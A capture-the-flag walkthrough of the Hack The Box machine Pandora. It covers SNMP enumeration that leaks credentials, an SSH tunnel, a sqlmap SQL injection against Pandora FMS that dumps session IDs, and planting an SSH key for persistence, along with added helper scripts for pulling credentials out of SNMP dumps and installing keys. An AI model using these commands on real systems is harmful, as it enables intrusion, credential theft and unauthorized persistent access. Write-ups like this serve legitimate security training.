Hack the Box : Pandora

Hack The Box

snmp-check returned a lot of output, so I first missed the user & password and proceeded with snmpwalk.

Finding a tiny piece of info in vast output can be a pain.

Replacing the “tar” that is called without a full path was the fun part.

00:17 feroxbuster

feroxbuster -u http://10.10.11.136 --force-recursion -C 404,405 -m GET,POST

00:31 UDP port scan

nmap -sU -v 10.10.11.136

00:39 SNMP enumeration

Port 161/udp is SNMP here.

sudo nmap -sU -A -Pn -n -p 161 --script=snmp-sysdescr 10.10.11.136

onesixtyone 10.10.11.136 -c /usr/share/doc/onesixtyone/dict.txt

snmp-check -p 161 10.10.11.136

I somehow also tried snmpbulkwalk.

I decided not to use the -Cr option, as a timeout happens when it is set greater than the default value (10).

This may be an issue with my local machine's specs.

-t is the timeout in seconds.

snmpbulkwalk -Cr10 -c public -t 20 -v2c 10.10.11.136 . > snmpbulkwalk
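The credentials hide in the HOST-RESOURCES-MIB process table, where hrSWRunName.N is a process name and hrSWRunParameters.N its command line, and a full walk buries them among thousands of other lines. The script below is an added example, not from the original post: it pulls that table out of a saved snmpbulkwalk dump (the file written by the command above) and filters for argument strings that look like secrets. The sample dump, including its user and password, is constructed for this example and is not data from the box; it uses net-snmp's output format and handles both symbolic OIDs (MIBs loaded) and numeric ones (MIBs missing).

```shell
#!/bin/sh
# Added example (not from the original post): pick the process table out of a
# saved snmpbulkwalk dump so that credentials passed on a command line are not
# lost in the noise. The sample dump, including its user/password, is
# constructed for this example and is not data from the box.

# Join hrSWRunName.N (process name) with hrSWRunParameters.N (its arguments).
# Handles symbolic OIDs (HOST-RESOURCES-MIB::hrSWRunName.N, MIBs loaded) and
# numeric ones (iso.3.6.1.2.1.25.4.2.1.2.N / ...25.4.2.1.5.N, MIBs missing).
snmp_procs() {
    awk -F' = STRING: ' '
        /hrSWRunName\.|\.25\.4\.2\.1\.2\./       { n=$1; sub(/.*\./, "", n); name[n]=$2 }
        /hrSWRunParameters\.|\.25\.4\.2\.1\.5\./ { n=$1; sub(/.*\./, "", n); args[n]=$2 }
        END {
            for (n in name)
                if (n in args && args[n] != "\"\"")
                    printf "%s\t%s\t%s\n", n, name[n], args[n]
        }' "$1" | sort -n
}

# Narrow the process list to arguments that look like they carry secrets.
snmp_creds() {
    snmp_procs "$1" | grep -iE -- '(-p |-p=|pass|pwd|secret|token|key=)'
}

# Constructed sample in net-snmp output format (not real box data).
make_sample() {
    cat > "$1" <<'EOF'
HOST-RESOURCES-MIB::hrSWRunName.1 = STRING: "systemd"
HOST-RESOURCES-MIB::hrSWRunName.1234 = STRING: "cron"
HOST-RESOURCES-MIB::hrSWRunName.1367 = STRING: "bash"
HOST-RESOURCES-MIB::hrSWRunName.1402 = STRING: "sshd"
HOST-RESOURCES-MIB::hrSWRunParameters.1 = STRING: "--system --deserialize 36"
HOST-RESOURCES-MIB::hrSWRunParameters.1234 = STRING: "-f"
HOST-RESOURCES-MIB::hrSWRunParameters.1367 = STRING: "-c /usr/local/bin/example_tool -u example_user -p example_pass"
HOST-RESOURCES-MIB::hrSWRunParameters.1402 = STRING: ""
EOF
}

# With a file argument, scan that dump; without one, run on the constructed sample.
if [ "$#" -gt 0 ]; then
    snmp_creds "$1"
else
    sample=$(mktemp)
    make_sample "$sample"
    snmp_creds "$sample"
    rm -f "$sample"
fi
```

Run it as `sh snmp_procs.sh snmpbulkwalk` against the dump from the command above. The keyword filter is a heuristic; when it finds nothing, read the whole `snmp_procs` listing, since a password may sit behind an argument name the list does not cover.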

01:31 ssh tunnel

ssh -L 80:localhost:80 daniel@10.10.11.136

Binding local port 80 needs root on your own machine; the sqlmap URL below assumes the forward is on port 80.

01:47 Pandora FMS 742: Critical Code Vulnerabilities

Here, the vulnerability is well explained, including why the SQL injection below reveals session IDs.

sqlmap --url="http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" -D pandora -T tsessions_php --dump

Add your own public key so you can ssh in:

1. prepare a new key pair for this purpose only

ssh-keygen -f pandora.key

Then we have pandora.key & pandora.key.pub.

2. mkdir .ssh under matt's home directory and add an authorized_keys file.

mkdir .ssh
chmod 700 .ssh
touch authorized_keys
chmod 600 authorized_keys

3. Copy & paste the contents of pandora.key.pub into authorized_keys (append with >> so any existing keys survive)

echo "<contents of pandora.key.pub>" >> authorized_keys

4. log in

ssh -i pandora.key matt@10.10.11.136
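Steps 2 and 3 above, as an added example that is not part of the original post: the same directory and file setup, but idempotent (the key is appended only once) and with the permission checks that sshd's StrictModes (on by default) enforces before it will accept a key. The target home directory is a parameter so the script can be rehearsed in a temp directory; on the box it would be matt's home. The key line used in the rehearsal is constructed and not a working key.

```shell
#!/bin/sh
# Added example (not from the original post): install a public key for SSH
# access the way steps 2-3 above do, but idempotently and with the permission
# checks sshd's StrictModes enforces. HOME_DIR is a parameter so this can be
# rehearsed in a temp dir; on the box it would be matt's home.

install_pubkey() {
    home=$1; pub=$2
    mkdir -p "$home/.ssh"
    chmod 700 "$home/.ssh"
    touch "$home/.ssh/authorized_keys"
    chmod 600 "$home/.ssh/authorized_keys"
    # Append only if this exact key line is not already present (>>, never >,
    # so the user's existing keys survive).
    if ! grep -qxF "$(cat "$pub")" "$home/.ssh/authorized_keys"; then
        cat "$pub" >> "$home/.ssh/authorized_keys"
    fi
}

# sshd with StrictModes refuses the key if the home directory is group- or
# world-writable, or if ~/.ssh / authorized_keys are not 700 / 600.
check_ssh_perms() {
    home=$1
    [ -n "$(find "$home" -prune ! -perm -020 ! -perm -002 -print)" ] \
        || { echo "home dir is group/world writable"; return 1; }
    [ -n "$(find "$home/.ssh" -prune -perm 700 -print)" ] \
        || { echo ".ssh is not 700"; return 1; }
    [ -n "$(find "$home/.ssh/authorized_keys" -prune -perm 600 -print)" ] \
        || { echo "authorized_keys is not 600"; return 1; }
    echo "permissions ok"
}

# Rehearsal in a throwaway directory with a constructed, non-functional key line.
demo_home=$(mktemp -d)
printf 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEKEYDATAONLY demo@example\n' > "$demo_home/demo.pub"
install_pubkey "$demo_home" "$demo_home/demo.pub"
check_ssh_perms "$demo_home"
rm -rf "$demo_home"
```

If `ssh -i pandora.key matt@...` still asks for a password after this, run `check_ssh_perms` on matt's real home directory first; a world-writable home or a 644 authorized_keys is the usual reason sshd silently ignores the key.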